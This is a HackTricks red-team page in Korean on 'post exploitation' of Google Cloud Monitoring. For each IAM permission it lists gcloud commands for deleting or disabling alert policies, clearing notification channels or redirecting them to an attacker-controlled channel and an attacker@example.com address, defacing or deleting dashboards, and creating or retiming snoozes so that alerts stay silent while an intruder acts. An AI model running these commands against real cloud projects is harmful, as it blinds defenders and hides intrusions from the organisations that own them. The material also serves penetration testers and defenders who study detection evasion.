GCP - Monitoring Post Exploitation

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

모니터링

자세한 정보는 다음을 참조하세요:

pageGCP - Monitoring Enum

로그를 방해하는 다른 방법은 다음을 확인하세요:

pageGCP - Logging Post Exploitation

monitoring.alertPolicies.delete

경고 정책 삭제:

gcloud alpha monitoring policies delete <policy>

monitoring.alertPolicies.update

알림 정책 방해하기:

# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled

# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels

# Chnage notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>

monitoring.dashboards.update

대시보드를 수정하여 중단시킵니다:

# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''

monitoring.dashboards.delete

대시보드 삭제:

# Delete dashboard
gcloud monitoring dashboards delete <dashboard>

monitoring.snoozes.create

알림을 생성하지 않도록 정책을 중지시키기 위해 snoozer를 생성합니다:

# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
--start-time="2023-03-01T03:00:00.0-0500" \
--end-time="2023-03-07T23:59:59.5-0500"

monitoring.snoozes.update

악당이 관심을 가질 때 알림이 생성되지 않도록 스누저의 타이밍을 업데이트합니다:

# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME

# odify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>

monitoring.notificationChannels.delete

구성된 채널을 삭제합니다:

# Delete channel
gcloud alpha monitoring channels delete <channel>

monitoring.notificationChannels.update

채널의 레이블을 업데이트하여 중단시킵니다:

# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

最終更新